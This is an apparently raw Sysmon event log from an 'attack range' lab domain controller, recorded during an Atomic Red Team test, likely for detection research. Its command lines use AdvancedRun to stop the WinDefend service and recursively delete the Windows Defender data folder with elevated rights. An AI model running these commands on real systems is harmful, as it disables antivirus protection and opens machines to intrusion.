Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951891Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.261{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951890Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.261{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951889Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.261{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951888Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.261{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951887Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.261{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951886Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.261{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951885Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.261{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951884Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.261{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951883Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.261{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951882Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.261{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951881Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.261{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 734700x80000000000000003951880Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.261{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951879Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.261{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003951878Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.261{834264DD-DAF8-61EA-5B00-000000002702}41004116C:\Windows\system32\csrss.exe{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003951877Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.261{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003951876Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.261{834264DD-ED46-61EA-7703-000000002702}46402368C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11ATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000003951875Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.265{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory /RunAs 8 /RunC:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-ED46-61EA-7703-000000002702}4640C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} ATTACKRANGE\Administrator 734700x80000000000000003951874Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.261{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951873Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.261{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951872Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.261{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000003951871Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.245{834264DD-DAF8-61EA-5B00-000000002702}41005552C:\Windows\system32\csrss.exe{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003951870Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.245{834264DD-ED46-61EA-7703-000000002702}46402368C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11ATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000003951869Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.251{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe" /EXEFilename C:\Windows\System32\sc.exe /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory /RunAs 8 /RunC:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-ED46-61EA-7703-000000002702}4640C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} ATTACKRANGE\Administrator 154100x80000000000000003951618Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:38.990{834264DD-ED46-61EA-7703-000000002702}4640C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000003951260Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:31.592{834264DD-ED3F-61EA-7403-000000002702}2832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if(Test-Path -Path C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 11241100x80000000000000003951253Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:31.480{834264DD-ED3E-61EA-7303-000000002702}6028C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exe2022-01-21 17:28:31.480ATTACKRANGE\Administrator 154100x80000000000000003950367Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:30.113{834264DD-ED3E-61EA-7203-000000002702}3912C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if(Test-Path -Path C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000003950004Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:25.873{834264DD-ED39-61EA-6F03-000000002702}4784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if(Test-Path -Path C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000003949395Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:29.049{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 10341000x80000000000000003949374Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.952{834264DD-DB11-61EA-9500-000000002702}4285520C:\Windows\Explorer.EXE{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 